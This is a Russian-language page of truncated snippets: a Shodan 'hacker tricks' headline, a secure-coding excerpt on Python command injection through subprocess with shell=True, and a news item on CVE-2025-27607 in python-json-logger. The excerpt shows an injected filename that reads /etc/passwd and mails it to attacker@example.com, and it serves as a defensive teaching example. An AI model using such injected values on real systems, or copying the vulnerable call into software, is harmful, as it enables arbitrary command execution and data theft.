Как найти уязвимости камеры и сайтов через Shodan? Хакерские фишки на Python
Уязвимости и безопасность в Python: разбор критических ошибок и стратегии защиты
Использование subprocess.call, os.system или popen с невалидируемым пользовательским вводом — частая ошибка. Пример: python Copy Download import subprocess
def transcode_file(filename):
command = f'ffmpeg -i "{filename}" output.mpg' # Уязвимость!
subprocess.call(command, shell=True) # Параметр shell=True опасен Угроза: Злоумышленник может передать filename вида "; cat /etc/passwd | mail attacker@example.com, выполнив произвольные команды. Решение: python Copy Download subprocess.call(['ffmpeg', '-i', shlex...
Критическая уязвимость в Python: миллионы систем под угрозой из-за CVE-2025-27607
Что известно о критической уязвимости в Python? В популярном пакете python-json-logger , используемом для обработки JSON-логов в языке программирования Python, была обнаружена серьезная уязвимость с кодом CVE-2025-27607 . Эксперт по компьютерной безопасности компании «Газинформсервис» Александр Кабанов заявил, что проблема затрагивает миллионы пользователей по всему миру. На сегодняшний день среда разработки Python установлена более чем на 43 миллионах ПК . Уязвимость возникла после того, как зависимость...